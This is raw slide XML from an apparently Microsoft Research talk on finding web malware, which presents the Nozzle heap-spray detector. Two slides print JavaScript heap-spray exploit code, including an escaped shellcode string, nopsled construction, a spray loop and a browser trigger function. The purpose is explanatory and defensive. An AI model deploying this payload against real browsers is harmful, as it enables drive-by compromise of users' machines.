          <a:ext cx="4572003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300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>     </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2300" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>2002</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>      </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2300" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Heap-based</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2300" kern="1200" dirty="0" smtClean="0"/>
            <a:t> overruns</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2897908" y="1536192"/>
        <a:ext cx="4572003" cy="1002995"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7D22A50F-E370-48F7-A763-3AFEC30AE2CD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2969706" y="2717190"/>
          <a:ext cx="1036030" cy="1036320"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse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381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C2106-E3C6-45F7-BE61-F085F69BFF2A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1120105" y="2738323"/>
          <a:ext cx="7315195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200" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>                         2005</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2200" kern="1200" dirty="0" smtClean="0"/>
            <a:t>      </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2200" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Drive-by</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2200" kern="1200" dirty="0" smtClean="0"/>
            <a:t> attacks and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2200" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>heap sprays</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2200" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1120105" y="2738323"/>
        <a:ext cx="7315195" cy="1002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00" units="cm"/>
          <inkml:channel name="Y" type="integer" max="1050" units="cm"/>
        </inkml:traceFormat>
        <inkml:channelProperties>
          <inkml:channelProperty channel="X" name="resolution" value="28.34008" units="1/cm"/>
          <inkml:channelProperty channel="Y" name="resolution" value="28.37838" units="1/cm"/>
        </inkml:channelProperties>
      </inkml:inkSource>
      <inkml:timestamp xml:id="ts0" timeString="2010-09-11T08:26:18.9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51 742,'0'0,"0"0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,-23-24,23 24,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,-24 0,24 0,0 0,0-24,0 24,0-23,0 23,24-24,-24 0,23 24,-23-24,0 1,24-1,0 0,0 0,-24 1,23-1,1 0,24 24,-25-24,1 1,24-1,-25 24,1-24,23 24,-23-24,24 24,-25 0,1 0,0 0,0 0,-1 0,25 24,-24-24,-1 24,1-24,0 24,0-1,-1-23,1 24,0-24,-24 0,24 24,-1-24,-23 0,24 0,0 0,-24 0,23 0,1 0,-24 0,24 0,0-24,-1 24,1 0,0-24,0 24,-1-23,25-1,-24 0,-1-23,25 23,-24 0,23 1,-23-1,23 0,-23 0,0 1,23-1,-23 24,23 0,-23-24,24 24,-1 0,-23 24,23-24,-23 0,24 24,-1-24,-23 23,23 1,1-24,-1 24,-23 0,23-1,1 1,-24-24,23 24,1-24,-25 23,25-23,-1 0,-23 0,23 0,-23 0,24-23,-1 23,-23 0,23 0,-23-24,0 24,23-24,-23 24,24 0,-1 0,-23-23,23 23,-23 0,23 0,-23 0,24 0,-25 0,25 0,-24 0,23 0,-23 0,0 23,23-23,-23 24,23-24,-23 24,0-24,23 23,-23 1,23-24,-23 24,0-24,23 0,-23-24,24 24,-25-24,25 24,-1-23,-23 23,24-24,-1 0,-23 24,23-23,1 23,-25-24,25 24,-1-24,-23 24,0 0,23-24,-23 24,24 0,-25 24,25-24,-1 0,1 24,-25-24,25 24,-1-1,-23-23,24 24,23 0,-47-1,23-23,1 24,-1 0,0-24,1 0,-1 24,1-24,-1 0,-23 0,24 0,-1-24,1 24,-1-24,0 0,1 24,-1-23,-23 23,24-24,-1 24,1 0,-25 0,25 24,-24-24,23 0,-23 23,23-23,-23 0,23 0,1 0,-1 24,-23-24,24 24,-1-24,-23 24,23-1,-23-23,24 24,-25-24,25 0,-24 0,-1 0,25 0,-25 0,1-24,0 24,23 0,-23-23,0 23,23-24,-23 24,0-24,0 0,23 1,-23 23,0-24,-1 0,25 1,-25-1,25 24,-24-24,-1 0,25 24,-1-23,-23 23,24 0,-25 0,25 0,-1 0,-23 0,24 23,-25-23,25 24,-25-24,1 0,24 24,-25-24,1 0,24 0,-25-24,1 24,0 0,0 0,-1-24,1 24,24-23,-25 23,1-24,0 24,23 0,-23-24,0 0,-1 24,25 0,-24-23,-1 23,25-24,-1 24,1 0,-1 0,1 0,-1 0,1 0,-1 24,1-24,-1 23,1 1,-1 0,1 23,-1-23,1 0,-25 23,25-23,-24 23,-1-23,1 0,23 0,-23-1,0 1,23-24,-23 0,0-24,0 24,23-23,-23-1,0 0,-1 0,25 1,-24-1,-1 0,1 1,23-1,-23 24,0-24,0 0,-1 24,1 0,0 0,0 0,-1 0,1 0,0 0,0 24,23 0,-23-24,0 24,-1-1,1-23,0 24,0 0,-1-24,1 23,0-23,-1 0,25 0,-24 0,23 0,1 0,-1-23,1 23,-1-24,1 0,23 24,-48-23,25 23,-24 0,-24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00" units="cm"/>
          <inkml:channel name="Y" type="integer" max="1050" units="cm"/>
        </inkml:traceFormat>
        <inkml:channelProperties>
          <inkml:channelProperty channel="X" name="resolution" value="28.34008" units="1/cm"/>
          <inkml:channelProperty channel="Y" name="resolution" value="28.37838" units="1/cm"/>
        </inkml:channelProperties>
      </inkml:inkSource>
      <inkml:timestamp xml:id="ts0" timeString="2010-09-11T08:26:46.222"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.08819" units="cm"/>
      <inkml:brushProperty name="height" value="0.08819" units="cm"/>
      <inkml:brushProperty name="color" value="#FF0000"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 7678,'0'0,"0"0,24 0,-24 0,0-22,0 22,0-22,0 22,0-22,0 22,0 0,0 0,0-22,0 22,0 0,0 0,0-22,0 22,0 0,0 0,0 0,0 0,0 0,24-22,0 22,-24-22,23 22,1 0,0-22,23 22,-23-22,24 22,-25 0,1-22,23 22,1-22,-24 22,23-22,-23 22,0 0,-1 0,1 0,0 22,23-22,-23 22,0 0,-24-22,24 22,-1 0,1 0,0 0,0 0,-1 0,1-22,0 22,-1 0,1 0,0-22,0 22,-1 0,1-22,0 22,0 0,-1-22,1 22,0-22,0 22,-1-22,-23 0,24 22,0-22,-24 0,24 22,-1-22,1 0,-24 0,24 0,0 22,-1-22,1 0,0 0,-24 0,23 0,1 0,0 0,23 0,-23-22,0 22,0 0,23-22,-23 22,0-22,23 22,-23-22,23 0,-23 0,23 22,1-22,-24 0,23 0,-23 0,0 0,23 0,-23 0,0 0,23 0,-23 0,0 22,-1-22,1 22,0-22,0 22,23-22,-23 22,-1 0,1-22,0 22,23 0,-23 0,0 0,23 0,-23 0,24 0,-25 22,25-22,-24 0,23 0,-23 0,23 22,-23-22,0 0,23 22,-23-22,0 0,23 22,-23-22,0 0,23 22,-23-22,0 22,-1-22,1 22,0 0,0-22,-1 22,1 0,0-22,-1 22,1 0,24-22,-25 22,1 0,0-22,0 22,-1-22,-23 0,24 22,0 0,0-22,-1 0,-23 22,24-22,0 0,0 0,-1 0,-23 22,24-22,-24 0,24 0,0 0,-1 0,1 22,0-22,-24 0,23 0,1 0,0 0,0 22,-1-22,25 0,-24 0,-1 0,1 0,0 22,0-22,-1 0,1 0,0 0,0 0,23 22,-23-22,-1 0,1 0,24 0,-25 0,1 0,0 0,0 0,-1 0,1 0,0 0,0 0,-1 0,25 0,-24 0,-1-22,1 22,0 0,0-22,-1 22,1 0,-24-22,24 22,-1-22,1 22,-24-22,24 22,0-22,-24 0,0 22,23-22,1 22,-24-22,24 0,0 22,-24-22,23 0,1 0,-24 0,24 0,0 0,-24 0,23 22,1-22,0 22,0-22,-1 22,1-22,0 22,-1-22,1 22,0-22,-24 22,24-22,-1 22,1-22,0 22,0-22,-1 22,1 0,0 0,0 0,-1-22,1 22,0 0,-24 0,24 0,-1 0,1 0,0 0,0 0,-24 0,23 22,1-22,23 0,-47 0,48 0,-48 22,24-22,-1 0,1 0,0 22,0-22,-1 0,1 0,0 22,-24-22,24 0,-1 0,1 22,-24-22,24 0,0 22,-24-22,23 0,-23 22,24-22,0 0,-24 22,24-22,-24 0,23 22,-23-22,24 0,-24 0,24 22,-24-22,23 0,-23 22,24-22,0 22,-24-22,0 0,0 0,47 22,-47-22,0 22,0-22,24 0,-24 0,24 22,0-22,-24 0,23 22,-23-22,24 22,0-22,-24 0,24 22,-1-22,1 0,0 0,-24 0,24 22,-1-22,-23 0,24 0,-24 0,24 0,-24 0,23 0,-23 0,24 22,-24-22,0-22,0 22,24 0,-24 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 22,0-22,0 0,0 0,24 0,-24 0,23 0,-23 0,0 0,0 0,24-22,-24 22,24 0,-24 0,24-22,-24 22,23 0,-23-22,24 22,-24 0,24 0,-24-22,24 22,-1 0,-23 0,24-22,0 22,-24-22,24 22,-1-22,-23 22,24-22,0 0,0 22,-24-22,23 0,1 0,0 22,-24-22,23 0,1 22,-24-22,24 0,0 0,-24 22,23-22,-23 0,24 0,-24 22,24-22,-24 0,24 0,-24 22,0-22,23 0,-23 22,0-22,24 0,-24 0,0 22,0-22,0 0,0 0,24 0,-24 0,0 0,0 0,0 0,0 0,24-22,-24 22,0 0,0 0,0-22,23 22,-23 0,0 0,0-22,0 22,24 0,-24-22,0 22,0 0,24 0,-24 0,0-22,24 22,-24 0,0-22,23 22,-23 0,0 0,0 0,0-22,0 22,0 0,0 0,0 0,24-22,-24 22,0 0,0-22,0 22,0-22,0 22,0-22,24 22,-24-22,0 0,0 22,0-22,0 22,0-22,23 0,-23 0,0 22,0-22,24 0,-24 0,0 22,24-22,-24 0,0 0,24 0,-24 0,0 0,23 22,-23-44,0 22,24 22,-24-22,0-22,0 44,24-22,-24 0,0 22,0-22,0 22,0-22,0 0,0 22,0-22,0 22,0-22,0 0,0 0,0 22,0-22,0 0,0 22,0-22,24 0,-24 22,0-22,0 0,0 0,0 0,0 0,0 0,23-22,-23 22,0 0,0-22,0 22,24-22,-24 22,0-22,0 22,24 0,-24 0,0 0,24 0,-24 0,0 0,0 0,0 0,23 0,-23 0,0 0,0 0,0 0,24 22,-24-22,0 0,0 0,0 0,24 0,-24 0,0 0,0 0,0 0,0 0,24 0,-24 0,0 0,0 0,23 0,-23 0,0 0,0 0,24 22,-24-22,0 22,0-22,24 22,-24-22,0 22,0-22,0 0,24 0,-24 22,23-22,-23 0,0 0,24 0,-24 22,24-22,-24 0,23 0,1 22,-24-22,24 22,0-22,-24 0,23 22,-23-22,24 22,0-22,-24 22,24-22,-1 22,1-22,-24 22,24 0,0-22,-1 22,1 0,0 0,0 0,-1 0,-23 0,24 0,0 22,0-22,-1 0,-23 22,24-22,0 0,-1 22,1-22,0 0,23 0,-23 22,0-22,0 22,23-22,-23 0,23 22,-23-22,24 22,-1-22,0 22,1-22,-24 22,23-22,1 0,-1 0,24 22,-23-22,-1 0,1 22,23-22,-24 0,1 22,23-22,0 22,-23-22,23 22,-23-22,23 22,-24-22,1 22,-1-22,-23 22,0-22,-1 22,1 0,-24 0,24 0,0 0,-1 0,-23 0,0-22,0 0,-47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D0628-525F-423E-BE4C-C96693712918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1C8-AAC4-4012-9D8F-9ECA2B63A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Amazon:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> debugging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0F83-FF97-4F85-B35E-A1B8D40E04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9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point:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> mention path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5C594-DF70-4119-A8EA-F6CE8487AE9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1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the fact that we go into the else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> TOO!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5C594-DF70-4119-A8EA-F6CE8487AE9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1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Overhead: these are the 80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> percentile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5C594-DF70-4119-A8EA-F6CE8487AE9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56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End</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t> on:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> One element we have not covered here yet are savings due to fewer resource consumption. Since we don’t need to as many configurations, we save on energy and network bandwidth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5C594-DF70-4119-A8EA-F6CE8487AE9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2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CF11-85AB-4CFF-8EAC-FD0416555F98}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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2C0F-448C-4512-A544-299727A3B0EE}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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8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BED2-54FF-4BBE-8DB9-62BDF4ADEB8A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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1C4F-5CAF-42A5-96AA-0CF7E9A0076D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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4492-FFFE-44D6-BD6D-3C2FB3AFA188}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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70A1-DAB5-4192-AEED-223E93BEE3EF}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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6D69-73FB-4881-805D-A08130204044}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/16/2012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5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6FEC-F4C9-4D73-B487-C4B7E70037B0}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/16/2012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D6B9-AB24-4ECA-8D83-61BE68A5BD68}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/16/2012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AFA9-D68B-49B3-BC57-70B7AEBC8265}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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6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8387-02C4-42B7-A6A5-DCAE917F3FCC}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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7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0413B-4AA4-48CD-AF72-F1F8BC287BD3}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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0"/>
            <a:ext cx="1524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3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2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emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto2.wdp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto2.wdp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors1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icons.iconarchive.com/icons/rimshotdesign/nod/128/Network-File-Server-Disconnected-alt-icon.png" TargetMode="Externa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7392"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="785323"/>
            <a:ext cx="4772167" cy="60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8153400" cy="177165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Finding Malware </a:t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on a Web Scale</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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2743200"/>
            <a:ext cx="4426426" cy="3810000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 Livshits </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:endParaRPr lang="en-US" sz="2400" b="1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 Zorn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="20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Christian Seifert</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="20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Charlie Curtsinger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="20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 others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:endParaRPr lang="en-US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r"/>
            <a:r>
              <a:rPr lang="en-US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Microsoft Research</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US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Redmond, WA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Picture 14" descr="C:\Users\livshits\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZSOAFU22\MC90029086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137768" cy="3230578"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" sx="143000" sy="14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9" y="17526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398" y="2057400"/>
            <a:ext cx="991541" cy="10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267200"/>
            <a:ext cx="1905000" cy="17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1271835" cy="16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914400" cy="914400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>
          <a:xfrm rot="4026215">
            <a:off x="3976505" y="1726290"/>
            <a:ext cx="374219" cy="35874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29000" y="3505200"/>
            <a:ext cx="5334000" cy="2893100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FAFDDB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&lt;SCRIPT language="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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shellcode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("%u4343%u4343%...'');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oneblock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("%u0C0C%u0C0C");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oneblock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fullblock.length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&lt;0x40000) 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+=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}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sprayContainer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Array();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nn-NO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nn-NO" sz="14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nn-NO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nn-NO" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(i=0; i&lt;1000; i++) {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sprayContainer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fullblock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shellcode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}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800" y="2133600"/>
            <a:ext cx="27432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9600" y="2286000"/>
            <a:ext cx="6096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6800" y="3200400"/>
            <a:ext cx="609600" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="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1676400"/>
            <a:ext cx="197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Browser Heap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2362200" y="23622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800" y="32766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28194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47800" y="22098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62200" y="2819400"/>
            <a:ext cx="609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638800" y="3886200"/>
            <a:ext cx="2743200" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -36753"/>
              <a:gd name="adj2" fmla="val 8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Allocate 1,000s of malicious objects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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3600" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Drive-By </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Attack Example: Heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Spraying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84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8" y="152400"/>
            <a:ext cx="86868000" cy="6400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html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 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body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&gt;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   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button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=’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butid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’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onclick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’trigger();’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style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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1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display:none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/&gt;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  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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script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Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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err="1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shellcode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u9090%u9090%u9090%u9090%uceba%u11fa%u291f%ub1c9%udb33%ud9ce%u2474%u5ef4%u5631%u030e%u0e56%u0883%uf3fe%u68ea%u7a17%u9014%u1de8%u759c%u0fd9%ufefa%u8048%u5288%u6b61%u46dc%u19f2%u69c9%u94b3%u442f%u1944%u0af0%u3b86%u508c%u9bdb%u9bad%udd2e%uc1ea%u8fc1%u8ea3%u2070%ud2c7%u4148%u5907%u39f0%u9d22%uf385%ucd2d%u8f36%uf566%ud73d%u0456%u0b91%u4faa%uf89e%u4e58%u3176%u61a0%u9eb6%u4e9f%ude3b%u68d8%u95a4%u8b12%uae59%uf6e0%u3b85%u50f5%u9b4d%u61dd%u7a82%u6d95%u086f%u71f1%udd6e%u8d89%ue0fb%u045d%uc6bf%u4d79%u661b%u2bdb%u97ca%u933b%u3db3%u3137%u44a7%u5f1a%uc436%u2620%ud638%u082a%ue751%uc7a1%uf826%uac63%u1ac9%ud8a6%u8361%u6123%u34ec%ua59e%ub709%u552b%ua7ee%u5059%u6faa%u28b1%u05a3%u9fb5%u0fc4%u7ed6%ud357%ue537%u76df%u4148′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“%u0D0D%u0D0D”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headersize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=20;shellcodesize=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headersize+shellcode.length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A50021"/>
                </a:solidFill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bigblock.length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shellcodesize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){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+=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;}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heapshell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bigblock.substring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(0,shellcodesize);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bigblock.substring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(0,bigblock.length-shellcodesize);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nopsled.length+shellcodesize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&lt;0×25000){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nopsled+nopsled+heapshell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}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Spray</a:t>
            </a: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err="1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spray=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new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Array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();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(i=0;i&lt;500;i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++){spray[i]=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nopsled+shellcode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;}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Trigger</a:t>
            </a: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function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trigger(){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b="1" dirty="0" err="1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varbdy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document.createElement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(‘body’);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varbdy.addBehavior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(‘#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default#userData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’);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document.appendChild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varbdy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try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iter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=0;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iter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&lt;10;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iter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++) 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varbdy.setAttribute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s’,window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}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} </a:t>
            </a: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catch(e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){ }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window.status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+=”;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}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dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.getElementById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butid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’).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onclick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/script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body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11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11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html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295400"/>
            <a:ext cx="86868000" cy="2286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err="1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shellcode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=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1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1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u9090%u9090%u9090%u9090%uceba%u11fa%u291f%ub1c9%udb33%ud9ce%u2474%u5ef4%u5631%u030e%u0e56%u0883%uf3fe%u68ea%u7a17%u9014%u1de8%u759c%u0fd9%ufefa%u8048%u5288%u6b61%u46dc%u19f2%u69c9%u94b3%u442f%u1944%u0af0%u3b86%u508c%u9bdb%u9bad%udd2e%uc1ea%u8fc1%u8ea3%u2070%ud2c7%u4148%u5907%u39f0%u9d22%uf385%ucd2d%u8f36%uf566%ud73d%u0456%u0b91%u4faa%uf89e%u4e58%u3176%u61a0%u9eb6%u4e9f%ude3b%u68d8%u95a4%u8b12%uae59%uf6e0%u3b85%u50f5%u9b4d%u61dd%u7a82%u6d95%u086f%u71f1%udd6e%u8d89%ue0fb%u045d%uc6bf%u4d79%u661b%u2bdb%u97ca%u933b%u3db3%u3137%u44a7%u5f1a%uc436%u2620%ud638%u082a%ue751%uc7a1%uf826%uac63%u1ac9%ud8a6%u8361%u6123%u34ec%ua59e%ub709%u552b%ua7ee%u5059%u6faa%u28b1%u05a3%u9fb5%u0fc4%u7ed6%ud357%ue537%u76df%u4148′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 rot="19800000">
            <a:off x="6172200" y="3043537"/>
            <a:ext cx="2209800" cy="156966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</a:rPr>
              <a:t>Typical heap spray attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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561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More </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>omplex Malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="48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95" y="1610204"/>
            <a:ext cx="5792009" cy="45059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438400" y="5570560"/>
            <a:ext cx="5105400" cy="37303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az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1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ple-explo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23610" r="53472" b="10557"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="266700" y="1619250"/>
            <a:ext cx="3924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Detection Landscape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718953"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1447800" y="16002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Nozzle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Runtime Instrumentation Mechanics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2438400" y="2639552"/>
            <a:ext cx="2590800" cy="15771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Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>each heap object and disassemble it as code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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218" name="Picture 2" descr="http://www.livehacking.com/web/wp-content/uploads/2010/11/IE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2593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90850" y="4216733"/>
            <a:ext cx="2857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win32 interface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3279445" y="3730955"/>
            <a:ext cx="946810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alloc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4422445" y="3730954"/>
            <a:ext cx="946810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delloc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4700" y="5480566"/>
            <a:ext cx="4381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8087" y="5480566"/>
            <a:ext cx="4381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1474" y="5480566"/>
            <a:ext cx="4381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14861" y="5480566"/>
            <a:ext cx="4381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8250" y="5480566"/>
            <a:ext cx="4381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0259" y="55245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object buffer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9800" y="4375810"/>
            <a:ext cx="241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Instrument the browser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70478" y="2840665"/>
            <a:ext cx="2629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Intercept memory allocation calls using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Detours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86818" y="5247501"/>
            <a:ext cx="2293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Collect heap-allocated objects and buffer them</a:t>
            </a:r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26" y="1600200"/>
            <a:ext cx="31681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triped Right Arrow 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19800000">
            <a:off x="3505200" y="4395933"/>
            <a:ext cx="2060812" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="stripedRightArrow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86400" y="1459468"/>
            <a:ext cx="253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flow graph (CFG)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4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3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+mj-lt"/>
              </a:rPr>
              <a:t>Object Surface Area Calculation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Assume: attacker wants to reach shell code from jump to any point in object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Goal: find blocks that are likely to be reached via control flow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Strategy: use dataflow analysis to compute “surface area” of each block </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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BA0A167-59DF-4969-BF15-064A43B8E6D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5181600" y="5943600"/>
            <a:ext cx="2667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dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>An example object from visiting google.com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85250"/>
            <a:ext cx="3810000" cy="465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Nozzle: Runtime </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Heap Spraying Detection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8" name="Picture 2" descr="C:\pmax\main\ndure\nozzle\paper\data\econ_vs_exp-612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7738" y="2347913"/>
            <a:ext cx="4386262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V="1">
            <a:off x="457200" y="2438400"/>
            <a:ext cx="0" cy="3124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7200" y="5562600"/>
            <a:ext cx="3733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477145" y="5039902"/>
              <a:ext cx="3830400" cy="2674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65" y="5028022"/>
                <a:ext cx="385416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/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="495505" y="2438400"/>
              <a:ext cx="3888720" cy="2860342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665" y="2422559"/>
                <a:ext cx="3920400" cy="2892024"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1030" name="Picture 6" descr="C:\Users\livshits\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\O17RYBCL\MC900413624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18" y="2277324"/>
            <a:ext cx="2292036" cy="34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5105400" y="1893209"/>
            <a:ext cx="3691446" cy="1459591"/>
            <a:chOff x="5105400" y="1893209"/>
            <a:chExt cx="3691446" cy="1459591"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="57" name="Straight Arrow Connector 56"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
